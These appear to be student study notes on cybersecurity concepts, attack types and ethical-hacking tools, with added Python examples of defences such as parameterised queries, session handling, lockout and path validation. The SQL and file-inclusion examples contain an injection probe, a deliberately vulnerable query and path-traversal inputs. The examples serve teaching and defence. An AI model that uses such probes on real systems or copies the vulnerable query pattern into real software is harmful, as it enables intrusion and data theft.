Chapter 1 and 2-1

The document discusses concepts related to cyber security architecture and information gathering techniques used in ethical hacking. It defines security architecture as a unified security design that addresses risks and specifies where to apply controls. Key aspects of security architecture include relationships, benefits, forms, and drivers. The document also outlines common types of cyber attacks such as web-based attacks like SQL injection, session hijacking, and denial of service attacks. It discusses system-based attacks including viruses, worms, and trojan horses. Finally, it defines information gathering as collecting data through open source intelligence tools and techniques like password cracking and describes common tools used for information gathering including John the Ripper and Metasploit.

Uploaded by Tora Sarkar

Chapter 1

Cyber Security Concepts

1. Discuss security architecture.

Answer- Security architecture is a unified security design that addresses the necessities and
potential risks involved in a certain scenario or environment. It also specifies when and where
to apply security controls. The design process is generally reproducible.

In security architecture, the design principles are reported clearly, and in-depth security
control specifications are generally documented in independent documents. System
architecture can be considered a design that includes a structure and addresses the connection
between the components of that structure.

Techopedia Explains Security Architecture

The key attributes of security architecture are as follows:

- Relationships and Dependencies: Signifies the relationship between the various components
inside IT architecture and the way in which they depend on each other.
- Benefits: The main advantage of security architecture is its standardization, which makes it
affordable. Security architecture is cost-effective due to the re-use of controls described in the
architecture.
- Form: Security architecture is associated with IT architecture; however, it may take a variety
of forms. It generally includes a catalogue of conventional controls in addition to relationship
diagrams, principles, and so on.
- Drivers: Security controls are determined based on four factors:
  - Risk management
  - Benchmarking and good practice
  - Financial
  - Legal and regulatory

The key phases in the security architecture process are as follows:

- Architecture Risk Assessment: Evaluates the business impact of vital business assets, and
the likelihood and effects of vulnerabilities and security threats.
- Security Architecture and Design: The design and architecture of security services, which
support the business's risk exposure objectives.
- Implementation: Security services and processes are implemented, operated and controlled.
Assurance services are designed to ensure that the security policy and standards, security
architecture decisions, and risk management are mirrored in the real runtime implementation.
- Operations and Monitoring: Day-to-day processes, such as threat and vulnerability
management. Here, measures are taken to supervise and handle the operational state, in
addition to the depth and breadth of the system's security.

2. Discuss the types of attacks briefly.

Answer- A cyber-attack is an exploitation of computer systems and networks. It uses
malicious code to alter computer code, logic or data and lead to cybercrimes, such as
information and identity theft.

We are living in a digital era. Nowadays most people use computers and the internet. Because
of this dependency on digital systems, illegal computer activity is growing and changing,
like any other type of crime.

Cyber-attacks can be classified into the following categories:

Web-based attacks

These are the attacks which occur on a website or web applications. Some of the important
web-based attacks are as follows-

1. Injection attacks

It is an attack in which crafted data is injected into a web application to manipulate the
application and extract the information the attacker wants.

Example- SQL Injection, code Injection, log Injection, XML Injection etc.
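As an added illustration that is not part of the original notes, the Python snippet below builds a small in-memory SQLite table with constructed sample rows and shows the same lookup written two ways: a vulnerable version that concatenates user input into the SQL text, and a hardened version that uses a parameterised query. The table, row values and function names are constructed for this demo, not a library API.

```python
import sqlite3


def make_db():
    """Constructed sample data: an in-memory users table (not real accounts)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "alice@example.test"), ("bob", "bob@example.test")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, name):
    """BAD: the user's input becomes part of the SQL text, so the input can rewrite
    the query's logic (this is what an injection scanner looks for)."""
    query = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, name):
    """GOOD: a parameterised query. The driver passes the value separately from the
    SQL text, so whatever the input contains it is only ever compared as data."""
    return conn.execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # Input that closes the string literal and appends an always-true condition.
    probe = "x' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(conn, probe))  # every row comes back
    print("safe:      ", lookup_safe(conn, probe))        # no user has that literal name
```

The hardened form is the mitigation the rest of this chapter's SQL-related tools test for: never assemble SQL by string concatenation, and treat a query that does so as a finding even when no exploit has been demonstrated yet.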

2. DNS Spoofing

DNS spoofing is an attack in which forged data is introduced into a DNS resolver's cache,
causing the name server to return an incorrect IP address and diverting traffic to the
attacker's computer or any other computer. DNS spoofing attacks can go on for a long period
of time without being detected and can cause serious security issues.

3. Session Hijacking

It is an attack on a user's session over a protected network. Web applications create
cookies to store state and user sessions. By stealing the cookies, an attacker can gain
access to all of the user's data.
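The defensive side of the session description above, as an added example that is not from the original notes: a server-side session store whose cookie carries only an unguessable random ID, with an expiry, a rotation step after login (so an ID handed out before authentication cannot be reused) and a Set-Cookie header that carries the Secure, HttpOnly and SameSite attributes. The class and function names, the clock injection and the time-to-live are my assumptions for the demo.

```python
import secrets
import time


class SessionStore:
    """Server-side sessions: the browser only holds an opaque ID, never user data."""

    def __init__(self, ttl_seconds=1800, clock=time.time):
        self.ttl = ttl_seconds
        self.clock = clock              # injectable so expiry can be tested deterministically
        self.sessions = {}              # session_id -> {"user": ..., "expires": ...}

    def create(self, user):
        sid = secrets.token_urlsafe(32)  # 256 bits of CSPRNG output: not guessable or enumerable
        self.sessions[sid] = {"user": user, "expires": self.clock() + self.ttl}
        return sid

    def get_user(self, sid):
        entry = self.sessions.get(sid)
        if entry is None or entry["expires"] < self.clock():
            self.sessions.pop(sid, None)  # expired IDs are dropped, not silently honoured
            return None
        return entry["user"]

    def rotate(self, old_sid):
        """Issue a fresh ID after login or a privilege change and retire the old one,
        so an ID captured before that point is worthless (session fixation defence)."""
        user = self.get_user(old_sid)
        if user is None:
            return None
        del self.sessions[old_sid]
        return self.create(user)

    def invalidate(self, sid):
        """Logout: remove the server-side record so a stolen cookie stops working."""
        self.sessions.pop(sid, None)


def set_cookie_header(sid, max_age):
    """Cookie attributes that limit what a stolen or injected cookie can do:
    Secure   -> only sent over HTTPS, so a network sniffer never sees it
    HttpOnly -> not readable by page scripts, so XSS cannot exfiltrate it
    SameSite -> not attached to cross-site requests (CSRF)."""
    return (f"Set-Cookie: session={sid}; Max-Age={max_age}; Path=/; "
            "Secure; HttpOnly; SameSite=Strict")


if __name__ == "__main__":
    store = SessionStore()
    pre_login = store.create("anonymous")
    logged_in = store.rotate(pre_login)
    print(set_cookie_header(logged_in, store.ttl))
    print("old id still valid?", store.get_user(pre_login) is not None)
```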

4. Phishing

Phishing is a type of attack which attempts to steal sensitive information like user login
credentials and credit card number. It occurs when an attacker is masquerading as a
trustworthy entity in electronic communication.

5. Brute force

It is a type of attack which uses a trial and error method. The attack generates a large number
of guesses and validates them to obtain actual data, such as a user's password or personal
identification number. It may be used by criminals to crack encrypted data, or by
security analysts to test an organization's network security.

6. Denial of Service

It is an attack that is meant to make a server or network resource unavailable to its users. It
accomplishes this by flooding the target with traffic or sending it information that triggers a
crash. It uses a single system and a single internet connection to attack a server. It can be
classified into the following:

Volume-based attacks: Their goal is to saturate the bandwidth of the attacked site; they are
measured in bits per second.

Protocol attacks: These consume actual server resources and are measured in packets per
second.

Application layer attacks: Their goal is to crash the web server; they are measured in requests
per second.

7. Dictionary attacks

This type of attack uses a stored list of commonly used passwords and tries them one by one
until it finds the original password.
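Both the brute force and the dictionary attack above work by submitting many guesses, so the server-side control is the same for both: make each guess expensive and stop accepting guesses for an account after a few failures. The following added example (mine, not from the original notes) stores passwords as salted PBKDF2-SHA256 hashes, compares them in constant time, and locks an account for a window after a configurable number of failures, refusing even the correct password while locked. The user record, the iteration count, the window and the class name are assumptions chosen for the demo.

```python
import hashlib
import hmac
import secrets
import time

ITERATIONS = 100_000                 # PBKDF2 work factor: makes every guess cost real CPU time
DUMMY_SALT = b"\x00" * 16            # used for unknown users so timing does not reveal existence


def hash_password(password, salt=None):
    """Return (salt, digest) for storage; a fresh random salt per user defeats precomputed lists."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


class LoginGuard:
    """Login check with failure counting and a temporary lockout per account."""

    def __init__(self, users, max_failures=5, window_seconds=900, clock=time.time):
        self.users = users                 # username -> (salt, digest); constructed demo data
        self.max_failures = max_failures
        self.window = window_seconds
        self.clock = clock                 # injectable for deterministic tests
        self.failures = {}                 # username -> timestamps of recent failures

    def _recent_failures(self, username):
        cutoff = self.clock() - self.window
        recent = [t for t in self.failures.get(username, []) if t >= cutoff]
        self.failures[username] = recent
        return recent

    def attempt(self, username, password):
        """Return 'ok', 'denied' or 'locked'. A locked account rejects every guess,
        including the right one, until the window has passed."""
        if len(self._recent_failures(username)) >= self.max_failures:
            return "locked"
        # Always run the hash so unknown and known usernames take the same time.
        salt, expected = self.users.get(username, (DUMMY_SALT, None))
        _, digest = hash_password(password, salt)
        if expected is not None and hmac.compare_digest(digest, expected):
            self.failures.pop(username, None)
            return "ok"
        self.failures.setdefault(username, []).append(self.clock())
        return "denied"                    # same answer for bad user and bad password


if __name__ == "__main__":
    guard = LoginGuard({"alice": hash_password("correct horse battery")}, max_failures=3)
    for guess in ["123456", "password", "qwerty", "correct horse battery"]:
        print(guess, "->", guard.attempt("alice", guess))
```

The last line of the run shows the point: after three dictionary-style guesses the fourth attempt is reported as locked even though it is the real password, which is what turns an offline-speed guessing attack into a slow, noisy one that a log monitor can alert on.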

8. URL Interpretation

It is a type of attack in which certain parts of a URL are changed so that the web server
delivers web pages the attacker is not authorized to browse.

9. File Inclusion attacks

It is a type of attack that allows an attacker to access unauthorized or essential files that are
available on the web server, or to execute malicious files on the web server, by abusing the
application's include functionality.
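URL interpretation and file inclusion attacks both rely on the server mapping user-controlled text straight onto a file path. As an added example (not code from the original notes), the function below is the check a web application should apply before including anything: it refuses null bytes, URL schemes (remote inclusion) and absolute paths, resolves the candidate path and confirms it is still inside the template directory, and then only allows an explicit set of file types. The base directory, the suffix allowlist and the function name are assumptions for the demo.

```python
import os

ALLOWED_SUFFIXES = (".html", ".txt")   # assumption: only static templates may be included


def resolve_include(base_dir, requested):
    """Map a user-supplied include name to an absolute path under base_dir,
    or return None when the request must be refused."""
    base = os.path.realpath(base_dir)
    if not requested or "\x00" in requested:
        return None                       # empty name, or null-byte truncation trick
    if "://" in requested or os.path.isabs(requested):
        return None                       # remote file inclusion, or an absolute path
    candidate = os.path.realpath(os.path.join(base, requested))
    # realpath() has already collapsed "../" and followed symlinks; the result
    # must still share base_dir as its prefix, otherwise the request escaped it.
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not candidate.lower().endswith(ALLOWED_SUFFIXES):
        return None                       # e.g. application source or system files
    return candidate


if __name__ == "__main__":
    base = "/srv/app/templates"           # constructed base directory for the demo
    for req in ["pages/about.html", "../../../etc/passwd", "/etc/passwd",
                "http://example.test/x.txt", "pages/about.html\x00.php", "index.php"]:
        print(repr(req), "->", resolve_include(base, req))
```

Only the first request resolves; every other one is refused before any file is opened, which is the check a scanner is probing for when it sends traversal sequences in a URL parameter.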

10. Man in the middle attacks

It is a type of attack that allows an attacker to intercept the connection between a client and
a server and act as a bridge between them. As a result, the attacker is able to read, insert
and modify the data in the intercepted connection.

System-based attacks

These are the attacks which are intended to compromise a computer or a computer network.
Some of the important system-based attacks are as follows-

1. Virus

It is a type of malicious software program that spreads through the computer's files without
the knowledge of the user. It is a self-replicating malicious computer program that replicates by
inserting copies of itself into other computer programs when executed. It can also execute
instructions that cause harm to the system.

2. Worm

It is a type of malware whose primary function is to replicate itself in order to spread to
uninfected computers. It works much like a computer virus. Worms often originate from email
attachments that appear to be from trusted senders.

3. Trojan horse

It is a malicious program that causes unexpected changes to computer settings and unusual
activity, even when the computer should be idle. It misleads the user about its true intent. It
appears to be a normal application, but when it is opened or executed, malicious code runs
in the background.

4. Backdoors

It is a method that bypasses the normal authentication process. A developer may create a
backdoor so that an application or operating system can be accessed for troubleshooting or
other purposes.

5. Bots

A bot (short for "robot") is an automated process that interacts with other network services.
Some bot programs run automatically, while others only execute commands when they
receive specific input. Common examples of bot programs are crawlers, chatroom bots,
and malicious bots.

3. What is information gathering? State the different types of information gathering.

Answer- "Information is power," as the saying goes. And in most scenarios it's true: having
critical information, at the right time, and especially knowing how to use it, can be a great
source of power.

Of course, hacking has evolved too: nowadays you can find a lot of automated OSINT
Tools that can help anyone with security research and intel reconnaissance in a way that just
wasn’t possible twenty years ago.

In past decades, ethical hacking and penetration testing were performed by only a few
security experts. Now almost anyone can report security incidents. Ethical hacking tools
allow you to scan, search and find the flaws and vulnerabilities within any company to help
make their systems and applications more secure (as seen in the recent Top CVE’s exploited
in the wild post published a few weeks ago).

Today we’ll explore the best ethical hacking tools used by modern security researchers.

1. John the Ripper

John the Ripper is one of the most popular password crackers of all time. It’s also one of the
best security tools available to test password strength in your operating system, or for
auditing one remotely.

This password cracker is able to auto-detect the type of encryption used in almost any
password, and will change its password test algorithm accordingly, making it one of the most
intelligent password cracking tools ever.

This ethical hacking tool uses brute force technology to decipher passwords and algorithms
such as:

- DES, MD5, Blowfish
- Kerberos AFS
- Hash LM (Lan Manager), the system used in Windows NT / 2000 / XP / 2003
- MD4, LDAP, MySQL (using third-party modules)

Another bonus is that JTR is open source, multi-platform and fully available for Mac, Linux,
Windows and Android.

2. Metasploit

Metasploit is an open source cyber-security project that allows infosec professionals to use
different penetration testing tools to discover remote software vulnerabilities. It also functions
as an exploit module development platform.

One of the most famous results of this project is the Metasploit Framework, written in Ruby,
which enables you to develop, test and execute exploits easily. The framework includes a set
of security tools that can be used to:

- Evade detection systems
- Run security vulnerability scans
- Execute remote attacks
- Enumerate networks and hosts

Metasploit offers three different versions of their software:

- Pro: ideal for penetration testing and IT security teams.
- Community: used by small companies and infosec students.
- Framework: the best for app developers and security researchers.

Supported platforms include:

- Mac OS X
- Linux
- Windows

3. Nmap

Nmap (Network Mapper) is a free open source security tool used by infosec professionals to
manage and audit network and OS security for both local and remote hosts. It's one of the
most popular tools in the hacker's toolkit.

Despite being one of the oldest security tools in existence (launched in 1997), it continues to
be actively updated and receives new improvements every year.

It's also regarded as one of the most effective network mappers around, known for being fast
and for consistently delivering thorough results with any security investigation.

What can you do with Nmap?

- Audit device security
- Detect open ports on remote hosts
- Network mapping and enumeration
- Find vulnerabilities inside any network
- Launch massive DNS queries against domains and subdomains

Supported platforms include:

- Mac OS X
- Linux, OpenBSD and Solaris
- Microsoft Windows

4. Wireshark

Wireshark is a free open-source software that allows you to analyze network traffic in real
time. Thanks to its sniffing technology, Wireshark is widely known for its ability to detect
security problems in any network, as well as for its effectiveness in solving general
networking problems.

While sniffing the network, you're able to intercept and read results in human-readable
format, which makes it easier to identify potential problems (such as low latency), threats and
vulnerabilities.

Main features:

- Saves analysis for offline inspection
- Packet browser
- Powerful GUI
- Rich VoIP analysis
- Inspects and decompresses gzip files
- Reads other capture file formats including: Sniffer Pro, tcpdump (libpcap), Microsoft
Network Monitor, Cisco Secure IDS iplog, etc.
- Supported ports and network devices: Ethernet, IEEE 802.11, PPP/HDLC, ATM,
Bluetooth, USB, Token Ring, Frame Relay, FDDI.
- Protocol decryption includes, but is not limited to, IPsec, ISAKMP, Kerberos, SNMPv3,
SSL/TLS, WEP, and WPA/WPA2
- Exports results to XML, PostScript, CSV, or plain text

Wireshark supports up to 2000 different network protocols, and is available on all major
operating systems including:

- Linux
- Windows
- Mac OS X
- FreeBSD, NetBSD, OpenBSD
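To make the "human-readable format" point concrete, here is an added example (my code, not part of the original notes or of Wireshark) that does in a few dozen lines what a protocol dissector does: it decodes a raw Ethernet II frame into its IPv4 and TCP header fields. The frame it decodes is constructed in the same script with struct.pack (a TCP SYN from 10.0.0.5 to 10.0.0.7, port 443), so no capture file or network access is needed; the addresses, ports and MACs are invented sample values.

```python
import socket
import struct

TCP_FLAG_BITS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"),
                 (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG")]


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def tcp_flag_names(bits):
    return [name for mask, name in TCP_FLAG_BITS if bits & mask]


def parse_frame(frame):
    """Decode Ethernet II -> IPv4 -> TCP headers into a dict of readable fields.
    Returns what it has decoded so far if the payload is not IPv4 or not TCP."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    out = {"eth_dst": mac_str(dst), "eth_src": mac_str(src), "ethertype": hex(ethertype)}
    if ethertype != 0x0800:                       # not IPv4
        return out

    ip = frame[14:]
    if len(ip) < 20:
        raise ValueError("truncated IPv4 header")
    (ver_ihl, _tos, total_len, _ident, _flags_frag, ttl, proto, _csum,
     src_ip, dst_ip) = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4                    # header length in bytes, options included
    out.update({"ip_src": socket.inet_ntoa(src_ip), "ip_dst": socket.inet_ntoa(dst_ip),
                "ttl": ttl, "protocol": proto, "ip_total_len": total_len})
    if proto != 6:                                # not TCP
        return out

    tcp = ip[ihl:total_len]                       # drop Ethernet padding past the IP length
    if len(tcp) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, seq, ack, off_flags, window, _csum, _urg = struct.unpack("!HHIIHHHH", tcp[:20])
    data_off = (off_flags >> 12) * 4              # upper 4 bits: header length in 32-bit words
    out.update({"src_port": sport, "dst_port": dport, "seq": seq, "ack": ack,
                "flags": tcp_flag_names(off_flags & 0x3F), "window": window,
                "payload_len": len(tcp) - data_off})
    return out


def build_sample_syn():
    """Constructed sample frame (not a real capture): TCP SYN 10.0.0.5:51234 -> 10.0.0.7:443."""
    tcp = struct.pack("!HHIIHHHH", 51234, 443, 1000, 0, (5 << 12) | 0x02, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0x4000, 64, 6, 0,
                     socket.inet_aton("10.0.0.5"), socket.inet_aton("10.0.0.7"))
    eth = struct.pack("!6s6sH", bytes.fromhex("001122334455"),
                      bytes.fromhex("66778899aabb"), 0x0800)
    return eth + ip + tcp


if __name__ == "__main__":
    for key, value in parse_frame(build_sample_syn()).items():
        print(f"{key:>13}: {value}")
```

A SYN with no payload to port 443 is exactly the kind of record a packet browser shows one line at a time; counting many of them from one source to many ports is the basis of the port-scan detection that IDS tools layer on top of this decoding.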

5. OpenVAS

OpenVAS (also known as the old classic "Nessus") is an open-source network scanner used
to detect remote vulnerabilities in any hosts. One of the best-known network vulnerability
scanners, it's very popular among system administrators and DevOps and infosec
professionals.

Main features

- Powerful web-based interface
- 50,000+ network vulnerability tests
- Simultaneous multiple host scanning
- Able to stop, pause and resume scan tasks
- False positive management
- Scheduled scans
- Graphics and statistics generation
- Exports results to plain text, XML, HTML or LaTeX
- Powerful CLI available
- Fully integrated with Nagios monitoring software

While its web-based interface allows it to be run from any operating system, a CLI is also
available and works well for Linux, Unix and Windows operating systems.

The free version can be downloaded from the OpenVAS website, but there is also a
commercial enterprise license available from the Greenbone Security (parent company)
website.

6. IronWASP

If you’re going to perform ethical hacking, IronWASP is another great tool. It’s free, open
source and multi-platform, perfect for those who need to audit their web servers and public
applications.

One of the most appealing things about IronWASP is that you don’t need to be an expert to
manage its main features. It’s all GUI-based, and full scans can be performed in only a few
clicks. So, if you’re just getting started with ethical hacking tools, this is a great way to start.

Some of its main features include:

- Powerful GUI-based interface
- Web scan sequence recording
- Exports results into HTML and RTF file format
- 25+ different web vulnerabilities
- False positive and negative management
- Full Python and Ruby support for its scripting engine
- Can be extended by using modules written in C#, Ruby, and Python
- Supported platforms: Windows, Linux with Wine, and MacOS using CrossOver

7. Nikto

Nikto is another favorite in the hacker's toolkit, well-known as part of the Kali Linux
distribution. Other popular Linux distributions such as Fedora already come with Nikto
available in their software repositories as well.

This security tool is used to scan web servers and perform different types of tests against the
specified remote host. Its clean and simple command line interface makes it really easy to
launch any vulnerability testing against your target, as you can see in the following
screenshot:

Nikto's main features include:

- Detects default installation files on any OS
- Detects outdated software applications
- Runs XSS vulnerability tests
- Launches dictionary-based brute force attacks
- Exports results into plain text, CSV or HTML files
- Intrusion detection system evasion with LibWhisker
- Integration with Metasploit Framework

8. SQLMap

sqlmap is a well-known cyber-security tool written in Python that helps security researchers
launch SQL injection tests against remote hosts. With SQLMap you can detect and test
different types of SQL-based vulnerabilities to harden your apps and servers, or to report
vulnerabilities to different companies.

Its SQL injection techniques include:

- UNION query-based
- time-based blind
- boolean-based blind
- error-based
- stacked queries
- out-of-band

Main features:

- Multiple database server support: Oracle, PostgreSQL, MySQL and MSSQL, MS Access,
DB2 or Informix.
- Automatic code injection capabilities
- Password hash recognition
- Dictionary-based password cracking
- User enumeration
- Get password hashes
- View user privileges and databases
- Database user privilege escalation
- Dump table information
- Executes remote SQL SELECT statements

Check out the next video to see the true power of SQLMap using the sqlmap out-of-band
injection working with Metasploit integration against Microsoft SQL Server:

9. SQLNinja

SQLNinja is another SQL vulnerability scanner bundled with Kali Linux distribution. This
tool is dedicated to target and exploit web apps that use MS SQL Server as the backend
database server. Written in Perl, SQLNinja is available in multiple Unix distros where the
Perl interpreter is installed, including:

 Linux
 Mac OS X & iOS
 FreeBSD

SQLninja can be run in different types of modes such as:

 Test mode
 Verbose mode
 Fingerprint remote database mode
 Brute force attack with a word list
 Direct shell & reverse shell
 Scanner for outbound ports
 Reverse ICMP Shell
 DNS tunnelled shell

10. Maltego

Maltego is the perfect tool for intel gathering and data reconnaissance while you’re
performing the first analysis of your target.

In this case, it can be used to correlate and determine relationships between people, names,
phone numbers, email addresses, companies, organizations and social network profiles.

Along with online resources like Whois data, DNS records, social networks, search engines,
geolocation services and online API services it can also be used to investigate the correlation
between internet-based infrastructures including:

 Domain names
 DNS servers
 Netblocks
 IP addresses
 Files
 Web Pages

Main features include:

- GUI-based interface
- Analyzes up to 10,000 entities per graph
- Extended correlation capabilities
- Data sharing in real time
- Correlated data graphics generator
- Exports graphs to GraphML
- Generates entity lists
- Can copy and paste information

This application is available for Windows, Linux, and Mac OS, and the only software
requirement is to have Java 1.8 or greater installed.

11. Burp Suite

Burp Suite may well be one of the most popular platforms used in the security testing and
bug bounty hunting industry today. It includes several hacking tools that enable bug bounty
hunters and security researchers to detect, map, analyze, and ultimately exploit vulnerabilities
within the attack surface of any application.

Its main features include:

- Automated penetration testing
- Manual penetration testing techniques
- Interception of browser-based data
- Fast fuzzing and brute forcing attacks
- Automated vulnerability scanning
- Ability to perform attack analysis
- Productivity tools

12. NetStumbler

NetStumbler (also known as MiniStumbler) is one of the top ethical hacking tools used to
analyze IEEE 802.11a, 802.11b and 802.11g networks on Windows operating systems.

Often called "the Swiss Army knife of wireless network analysis", this hacking tool is now
one of the most popular pieces of software used to find, pivot and cross-relate data from a
wireless network, enabling researchers and IT administrators to find, analyze, configure and
harden their wireless networks.

Key NetStumbler features and capabilities include:

- Find and explore access points
- Access point filters
- Identify access point network configuration
- Detect illegal/unauthorized access points over the network
- Find root cause of network interferences
- Analysis of signal strength over the network

13. AirCrack-ng

AirCrack-ng is a respected Wifi security suite for home and corporate security investigations.
It includes full support for 802.11 WEP and WPA-PSK networks and works by capturing
network packets. It then analyzes and uses them to crack Wifi access.

For old-school security professionals, AirCrack-ng includes a fancy terminal-based interface
along with a few more interesting features.

Main features:

- Extensive documentation (wiki, manpages)
- Active community (forums and IRC channels)
- Support for Linux, Mac and Windows Wifi detection
- Launches PTW, WEP and Fragmentation attacks
- Supports WPA Migration Mode
- Fast cracking speed
- Multiple Wifi card support
- Integration with 3rd party tools

As a bonus, it comes bundled with a lot of Wifi auditing tools including:

- airbase-ng
- aircrack-ng
- airdecap-ng
- airdecloak-ng
- airdriver-ng
- aireplay-ng
- airmon-ng
- airodump-ng
- airolib-ng
- airserv-ng
- airtun-ng
- easside-ng
- packetforge-ng
- tkiptun-ng
- wesside-ng

14. Ettercap

Ettercap is a network interceptor and packet sniffer for LAN networks. It supports active and
passive scans as well as various protocols, including encrypted ones such as SSH and
HTTPS.

Other capabilities include network and host analysis (like OS fingerprint), as well as network
manipulation over established connections -- which makes this tool great for testing man-in-
the-middle attacks.

Main features

- Active and passive protocol analysis
- Filters based on IP source and destination, MAC and ARP addresses
- Data injection into established connections
- SSH and HTTPS encryption-based protocols
- Sniffs remote traffic over GRE tunnel
- Extensible with plugins
- Protocol support includes Telnet, FTP, IMAP, SMB, MySQL, LDAP, NFS, SNMP,
HTTP, etc.
- Determines OS name and version
- Able to kill established LAN connections
- DNS hijacking

15. Canvas

Canvas is a great alternative to Metasploit, offering more than 800 exploits for testing remote
networks.

Main features

- Remote network exploitation
- Targets different kinds of systems
- Targets selected geographic regions
- Takes screenshots of remote systems
- Downloads passwords
- Modifies files inside the system
- Escalates privileges to gain administrator access

This tool also lets you use its platform to write new exploits or use its famous shellcode
generator. It also integrates an alternative to nmap called scanrand, which is especially useful
for port scanning and host discovery over mid to large networks.

Supported platforms include:

 Linux
 MacOSX (requires PyGTK)
 Windows (requires Python and PyGTK)

4. What are open source free/trial tools in cyber security? Explain the different types of
open source free/trial tools.

Answer- Hackers are diverse, and so are cyber security tools. Various tools are available for
solving different issues. Paid tools like Acunetix and SolarWinds Security Event Manager
offer many advanced features but require significant investment.

But, many open source cyber security tools offer similar features at little or no cost. If you
have the technical expertise to use these free tools, they can provide everything you need to
secure modern day cloud infrastructure.

Plus, open source tools allow companies to customize the software as they see fit. So, if
you're interested in free security tools, check out these top 10 open source cyber security
tools.

1. Nmap

Nmap is an open source network scanner that rapidly scans large computer networks. It is first
on our list of Top 10 Best Free Open Source Cyber Security Tools. It is used for host discovery
as well as service and OS detection, and utilizes raw IP packets to dig up host information on a
network.

The Nmap Scripting Engine (NSE) offers a solid way of writing and sharing custom scripts
that tackle common problems. You can choose from many readily available scripts to
perform quick network scans.

Pros of Nmap
- Maps the network quickly without requiring complicated commands.
- Admins can search through subdomains and DNS queries with ease.
- Highly configurable, so users can easily customize the scans.
- Its lightweight nature makes it very quick and speeds up the start-up process.

Cons of Nmap
- Mastering all of Nmap's features has a steep learning curve.
- Scanning can take longer if you do not limit the network.
- Some scan types are aggressive and may unintentionally trigger IDS/IPS mechanisms.
2. Metasploit

Metasploit is a penetration testing framework that helps security professionals
perform simulated attacks to find loopholes in a system. It has a robust feature set that helps
detect bugs and validate attacks.

Additionally, Metasploit offers premium tiers for enterprises that need an all-in-one
penetration testing platform. However, the community edition is usually enough for SMEs.

Pros of Metasploit
- Fully cross platform and runs on Linux, macOS, and Windows systems.
- Community support for this open source security tool is excellent.
- Codebase is freely available and you can use it for integrations with other tools.
- Pro version unlocks powerful automation abilities useful for large scale security teams.

Cons of Metasploit
- Free edition is limited in features and requires significant technical expertise.
- Noticeable performance difference between the Windows and Linux versions.
- User intervention is needed for some exploits to work properly.

3. OSSEC

OSSEC is a free HIDS (Host based Intrusion Detection System) that performs real-time
monitoring and analysis. It is equipped with a solid correlation and analysis engine. The most
common uses for OSSEC include log analysis, integrity checks, Windows
registry monitoring, and security policy enforcement.

Pros of OSSEC
- Gives you real-time alerts for incidents and enables active responses.
- Log analysis: accepts logs from sources such as FTP servers, databases (PostgreSQL, MySQL)
and web servers.
- Compliant with various security auditing standards like PCI-DSS and CIS.
- Collects system information effectively and acts as a system inventory.
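The integrity check that OSSEC and other HIDS tools perform comes down to a hash baseline and a comparison. The following added example (mine, not OSSEC's code) builds a SHA-256 baseline of every regular file under a directory, then diffs two baselines into the three kinds of alert an integrity monitor raises: file added, file removed, file modified. The demo() function constructs its own scenario in a temporary directory (one config value tampered with, one file deleted, one unexpected script dropped in), so the file names and contents are invented sample data.

```python
import hashlib
import os
import tempfile


def file_digest(path, chunk_size=65536):
    """SHA-256 of a file's contents, read in chunks so large files never load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map each regular file under root (relative, '/'-separated path) to its SHA-256."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):          # hash real files only, not link targets twice
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = file_digest(full)
    return baseline


def compare_baselines(old, new):
    """Report what changed between two baselines, the way a HIDS integrity check alerts."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in old.keys() & new.keys() if old[p] != new[p]),
    }


def _write(root, rel, text):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(text)


def demo():
    """Constructed scenario: edit one file, delete one, drop one in; return the alert summary."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "etc/app.conf", "debug=false\n")
        _write(root, "etc/old.txt", "retire me\n")
        _write(root, "bin/service", "#!/bin/sh\necho ok\n")
        before = build_baseline(root)
        _write(root, "etc/app.conf", "debug=true\n")       # tampered setting
        os.remove(os.path.join(root, "etc", "old.txt"))    # removed file
        _write(root, "bin/.helper.sh", "#!/bin/sh\n")      # unexpected new executable
        after = build_baseline(root)
        return compare_baselines(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In a real deployment the baseline would be stored off the monitored host (or signed), since a baseline the attacker can rewrite proves nothing; the comparison itself is what produces the "file changed" alert that feeds the correlation engine described above.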

Cons of OSSEC
- Lack of a monitoring dashboard can make threat visualization harder.
- Upgrading the OSSEC version may result in inconsistencies between rules.
- Miscoordination with pre-shared keys can be troublesome.
4. Kali Linux

Kali is a popular Linux distribution for digital forensic analysis and penetration
testing. It is a Debian based distro that offers you some of the best open source cyber security
tools. This security focused OS has everything that you need for system assessments, including
surveillance and payload delivery tools.

Pros of Kali Linux
- Specialized environment for security professionals.
- Over 600 penetration tools included.
- Wireless device support.
- Most of the applications are derived from the Debian testing branch.
- You can run it almost everywhere, including the cloud, containers, Android, ARM and WSL.

Cons of Kali Linux
- Steep learning curve and may prove hard for beginners.
